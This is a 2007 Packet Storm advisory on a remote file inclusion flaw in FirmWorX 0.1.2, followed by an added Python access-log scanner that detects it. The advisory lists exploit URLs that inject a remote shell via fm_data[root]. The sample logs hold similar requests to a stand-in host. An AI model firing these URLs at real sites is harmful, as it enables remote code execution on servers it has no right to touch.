firmworx-rfi.txt

2007-05-30T00:00:00
ID PACKETSTORM:56961
Type packetstorm
Reporter Dav00d_Cracker
Modified 2007-05-30T00:00:00

Description

                                        
**********************************************************************************************************  
DeltaSecurityTEAM  
WwW.DeltaSecurity.iR  
**********************************************************************************************************  
  
* Portal Name = FirmWorX 0.1.2  
  
* Class = Remote File Inclusion  
  
* Risk = High (Remote File Execution)  
  
* Download = http://firmworx.sourceforge.net  
  
* Discovered By = DeltahackingTEAM  
  
* User In Delta Team = Dav00d_Cracker  
  
* Contact = Davood_cracker@yahoo.com  
  
--------------------------------------------------------------------------------------------  
  
Vulnerability C0de :  
  
  
require_once($fm_data['root']."/includes/config/db.inc.php");  
  
--------------------------------------------------------------------------------------------  
  
- Expl0it:  
  
http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?  
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?  
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?  
  
--------------------------------------------------------------------------------------------  
  
Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I  
  
**********************************************************************************************************  
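
Added example, not part of the original advisory: a log check that flags requests supplying the fm_data[root] / bank_data[root] parameters listed above, including percent-encoded forms. The sample log lines, the host names and the classify/scan function names are constructed for illustration, and matching other "<module>_data[root]" names is an assumption about the naming convention.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches fm_data[root] and bank_data[root] from the advisory, plus any other
# "<module>_data[root]" name following the same convention (assumption).
ROOT_PARAM = re.compile(r"^[A-Za-z_]\w*_data\[root\]$")
# Request target inside a Common/Combined Log Format line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with a URL scheme or "//" points the include at another host.
REMOTE = re.compile(r"^(?:[a-z][a-z0-9+.\-]+:|//)", re.I)

def classify(log_line):
    """Return None, 'root-override' or 'remote-root' for one access-log line."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    verdict = None
    # parse_qsl percent-decodes names and values, so %5Broot%5D is caught too.
    for name, value in parse_qsl(urlsplit(match.group(1)).query, keep_blank_values=True):
        if ROOT_PARAM.match(name):
            if REMOTE.match(value.strip()):
                return "remote-root"
            verdict = "root-override"
    return verdict

def scan(lines):
    """Return (line_number, verdict, path) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            path = urlsplit(REQUEST.search(line).group(1)).path
            hits.append((number, verdict, path))
    return hits

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [30/May/2007:10:00:01 +0000] "GET /fw/includes/config/master.inc.php?fm_data[root]=http://host.example/s.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [30/May/2007:10:00:03 +0000] "GET /fw/modules/bank/includes/design/main.inc.php?bank_data%5Broot%5D=http%3A%2F%2Fhost.example%2Fs.txt%3F HTTP/1.1" 200 498',
    '198.51.100.9 - - [30/May/2007:10:02:11 +0000] "GET /fw/includes/functions/master.inc.php?fm_data[root]=/tmp HTTP/1.1" 500 0',
    '192.0.2.44 - - [30/May/2007:10:05:40 +0000] "GET /fw/index.php?page=bank HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```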
  
  